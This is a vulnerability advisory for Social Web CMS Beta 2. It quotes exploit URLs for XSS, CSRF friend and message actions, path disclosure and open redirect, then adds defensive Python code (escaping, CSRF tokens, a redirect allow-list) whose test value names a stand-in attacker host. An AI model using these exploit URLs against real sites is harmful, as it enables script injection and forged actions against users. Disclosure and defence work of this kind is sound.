Vendor: Social Web CMS
By: cp77fk4r | Empty0pagE[Shift+2]gmail.com
CVSS: 8.8 (HIGH)
Vulnerability Classes: Directory Listing, XSS, CSRF, Full Path Disclosure, User Redirection
CWE: 79, 352, 352, 200, 601
Product Name: Social Web CMS
Affected Version From: X <= Beta 2
Affected Version To: X <= Beta 2
Patch Exists: NO
Related CWE: N/A
CPE: a:socialwebcms:social_web_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Social Web CMS X <= Beta 2 Vulnerabilities

Directory Listing: An attacker can view the directory structure of the application.
XSS: An attacker can inject malicious JavaScript code into the application.
CSRF: An attacker can add or remove friends, remove messages, and redirect users to malicious websites.
Full Path Disclosure: An attacker can view the full path of the application.
User Redirection: An attacker can redirect users to malicious websites.

Mitigation:

Implement input validation, follow secure coding practices, and use secure authentication, authorization, and communication protocols.

Exploit-DB raw data:

# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com
# Software Link: http://www.socialwebcms.com
# Version: X <= Beta 2
#
# Vulnz:
#
#[Directory Listing]
http://server/modules/
#
#
#[XSS]
http://server/index.php?category=%22%3E[XSS]
#
#
#[CSRF]
-Add friends:
 http://server/user/view/addfriend/login/[VALID_FRIEND]
 or
 http://server/user.php?login=[VALID_FRIEND]&view=addfriend
#
-Remove friends:
 http://server/user/view/removefriend/login/[VALID_FRIEND]
 or
 http://server/user.php?login=[VALID_FRIEND]&view=removefriend
#
-Remove Messages:
 http://server/module.php?module=simple_messaging&view=delmsg&msg_id=[MESSAGE_ID]
#
#
#[Full Path Disclosure] (From Unlogged Browsing)
http://server/module.php?module=simple_messaging&view=delmsg&msg_id=
#
#[User Redirection]
http://server/module.php?module=simple_messaging&view=compose&to=[VALID_FRIEND]&return=[URL]
#
# EOF
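The mitigation section above is generic, so here is what the three fixable classes in the advisory look like in code: output encoding for the reflected `category` parameter (XSS), a POST-plus-token requirement for the `addfriend`, `removefriend` and `delmsg` views (CSRF), and an allow-list for the `return` parameter of the compose view (User Redirection). This is an added example written for this page, not code from the advisory or from Social Web CMS; the secret, session id, view names as a Python set, and every sample value are constructed assumptions.

```python
"""Defensive counterparts to the issue classes listed in the advisory.

Added example, not the CMS's own code. The secret, session ids and sample
inputs are constructed for illustration.
"""
import hashlib
import hmac
import html
import secrets
from typing import Optional
from urllib.parse import urlsplit

# Constructed per-deployment secret; a real application loads it from config.
CSRF_SECRET = secrets.token_bytes(32)

# The advisory's state-changing views, which must never be reachable by GET.
STATE_CHANGING_VIEWS = {"addfriend", "removefriend", "delmsg"}


def render_category(category: str) -> str:
    """Reflect the `category` parameter into an attribute with HTML encoding.

    The advisory's payload closes the attribute with `">`; escaping both
    characters keeps the input inside the value instead of starting markup.
    """
    return '<input name="category" value="%s">' % html.escape(category, quote=True)


def make_csrf_token(session_id: str) -> str:
    """Derive a per-session token (HMAC over the session id) for forms to carry."""
    return hmac.new(CSRF_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_ok(method: str, view: str, session_id: str, submitted_token: Optional[str]) -> bool:
    """Allow a request if it is read-only, or is a POST carrying a valid token.

    Refusing GET for these views alone blocks the link/image style of CSRF in
    the advisory; the token additionally defends against forged cross-origin
    POSTs. Comparison is constant-time.
    """
    if view not in STATE_CHANGING_VIEWS:
        return True
    if method.upper() != "POST" or not submitted_token:
        return False
    return hmac.compare_digest(make_csrf_token(session_id), submitted_token)


def safe_return_url(candidate: Optional[str], default: str = "/") -> str:
    """Accept only site-local paths for the `return` parameter.

    Anything that names a scheme or host (`http://host/...`, `//host`,
    `/\\host`, which browsers normalise to `//host`, or `javascript:`) and
    anything containing control characters falls back to `default`.
    """
    if not candidate:
        return default
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        return default
    if not candidate.startswith("/") or candidate.startswith(("//", "/\\")):
        return default
    if any(ord(ch) < 0x20 for ch in candidate):  # CR/LF etc. would enable header injection
        return default
    return candidate


if __name__ == "__main__":
    sid = "constructed-session-id"
    print(render_category('">'))                                    # attribute stays closed
    print(csrf_ok("GET", "addfriend", sid, None))                   # False: GET never mutates
    print(csrf_ok("POST", "addfriend", sid, make_csrf_token(sid)))  # True
    print(safe_return_url("http://attacker.invalid/"))              # "/"
    print(safe_return_url("/module.php?module=simple_messaging"))   # unchanged
```

The redirect check deliberately rejects rather than tries to "clean" a hostile value: a `return` parameter that is not a plain local path is replaced with the default landing page, which is the only behaviour the compose view needs.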